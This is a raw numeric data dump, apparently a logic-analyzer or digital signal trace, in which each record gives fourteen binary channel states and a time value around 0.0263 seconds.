1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253148e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253172e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253200e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253224e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253348e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253372e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253400e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253424e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253548e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253572e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253600e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253624e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253748e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253772e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253800e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253824e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253924e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6253948e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6253972e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254000e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254024e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254124e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254148e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254172e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254200e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254224e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254348e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254372e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254400e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254424e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254548e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254572e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254600e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254624e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254748e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254772e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254800e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254824e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254924e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6254948e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6254972e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255000e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255024e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255124e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255148e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255172e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255200e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255224e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255348e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255372e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255400e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255424e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255548e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255572e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255600e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255624e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255748e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255772e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255800e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255824e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255852e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255876e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255900e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255924e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6255948e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6255972e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256000e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256024e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256052e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256076e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256100e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256124e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256148e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256172e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256200e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256224e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256252e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256276e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256300e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256324e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256348e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256372e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256400e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256424e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256452e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256476e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256500e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256524e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256548e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256572e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256600e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256624e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256652e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256676e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256700e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256724e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256748e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256772e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256800e-02 1,1,1,0,1,0,0,0,0,0,0,0,1,0,2.6256824e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,0,2.6256852e-02 1,1,1,0,1,0,0,0,0,0,0,0,0,1,2.6381624e-02 0,0,0,0,1,0,0,0,0,0,0,0,0,1,2.6381844e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6381868e-02 0,0,0,1,1,0,0,0,0,0,0,1,0,1,2.6381896e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6381924e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,2.6382208e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6382232e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,2.6382260e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6382284e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,2.6382308e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6382332e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,2.6382356e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6382380e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,1,2.6382408e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.6382432e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6382460e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6382484e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6382508e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6382532e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6382556e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6382580e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6382608e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6382632e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6382660e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6382684e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6382708e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6382732e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6382756e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6382780e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6382808e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6382832e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6382860e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6382884e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6382908e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6382932e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6382956e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6382980e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383008e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383032e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383060e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383084e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383108e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383132e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383156e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383180e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383208e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383232e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383260e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383284e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383308e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383332e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383356e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383380e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383408e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383432e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383460e-02 0,0,0,1,1,0,0,0,0,1,0,0,0,0,2.6383484e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6383488e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6383532e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6383556e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383564e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383580e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383608e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6383612e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6383632e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6383660e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6383684e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6383708e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6383732e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6383756e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6383780e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6383808e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6383832e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6383860e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6383908e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6383932e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383940e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6383956e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6383980e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384008e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384032e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384060e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384084e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384108e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384132e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384156e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384180e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384208e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384232e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384260e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384284e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384308e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384332e-02 0,0,0,1,1,0,0,0,0,1,0,0,0,0,2.6384336e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6384340e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6384384e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6384408e-02 0,0,0,1,1,1,0,0,0,0,0,0,0,0,2.6384412e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384416e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384432e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384460e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384484e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384508e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384532e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384556e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384580e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384608e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384632e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384660e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384684e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384708e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384732e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384756e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384780e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384808e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384832e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384860e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6384908e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6384932e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6384940e-02 0,0,0,1,1,1,0,0,0,1,0,0,1,0,2.6384980e-02 0,0,0,1,1,1,0,0,0,1,0,0,0,0,2.6385008e-02 0,0,0,1,1,1,0,0,0,0,0,0,0,0,2.6385012e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385016e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385032e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385060e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385084e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385108e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385132e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385156e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385180e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385208e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385232e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385260e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385284e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385308e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385332e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385356e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385380e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385408e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385432e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385460e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385484e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385508e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385532e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385556e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385580e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385608e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385632e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385652e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385684e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385708e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385732e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385756e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385780e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385808e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385828e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385856e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385880e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385908e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385932e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6385956e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6385980e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386008e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386028e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386052e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386080e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386108e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386132e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386156e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386180e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386208e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386228e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386252e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386280e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386308e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386332e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386356e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386380e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386408e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386428e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386452e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386480e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386508e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386532e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386556e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386580e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386608e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386628e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386652e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386684e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386708e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386732e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386756e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386780e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386808e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386832e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386860e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386884e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386908e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386932e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6386956e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6386980e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387008e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387032e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387060e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387084e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387108e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387132e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387156e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387180e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387208e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387232e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387260e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387284e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387308e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387332e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387356e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387380e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387408e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387432e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387460e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387484e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387508e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387532e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387556e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387580e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387608e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387632e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387652e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387684e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387708e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387732e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387756e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387780e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387804e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387828e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387852e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387880e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387904e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387932e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6387956e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6387980e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388004e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388028e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388052e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388080e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388104e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388132e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388156e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388180e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388204e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388228e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388252e-02 0,0,0,1,1,0,0,0,0,0,0,0,1,0,2.6388280e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,0,2.6388304e-02 